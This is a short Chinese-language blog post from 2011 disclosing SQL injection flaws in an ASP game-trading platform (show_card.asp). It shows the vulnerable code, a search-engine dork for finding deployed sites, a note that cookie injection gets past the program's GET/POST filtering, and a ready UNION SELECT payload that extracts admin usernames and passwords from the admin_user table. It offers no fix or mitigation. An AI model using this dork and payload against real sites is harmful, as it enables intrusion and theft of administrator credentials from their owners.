华速网游交易平台V13正式版多处存在注入漏洞

2011, January 23, 2:00 PM. 原创笔记
Submitted by admin

下载:http://down.admin5.com/asp/46191.html

关键字:inurl:show_card.asp?id=

漏洞文件:show_card.asp及其他多个文件

FROM:http://www.st999.cn/blog

<%id=trim(request("id"))
if id ="" then
response.Redirect("default.asp")
response.End()
end if
set rs=conn.execute("select * from card where id ="&id)
if rs.eof then
response.Write "该卡不存在"
response.End()
end if
user_name=rs("add_user")
set c1=conn.execute("select * from card_class where id="&rs("class_1"))
      if not c1.eof then
  c1_name=c1("name")
  card_img=c1("card_img")
  card_url=c1("card_url")
  end if
%>

这里的id直接代入查询,而程序也只防了get和post两种注入,那么我们就可以采用cookie注入获得管理员用户名和密码

大小: 60.39 K
尺寸: 500 x 399
浏览: 79 次
点击打开新窗口浏览全图

exp:

and 1=2 union select 1,2,3,admin,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin_user

 

Tags: 华速

« 上一篇 | 下一篇 »

只显示10条记录相关文章
华速网游交易平台oday (浏览: 11047, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):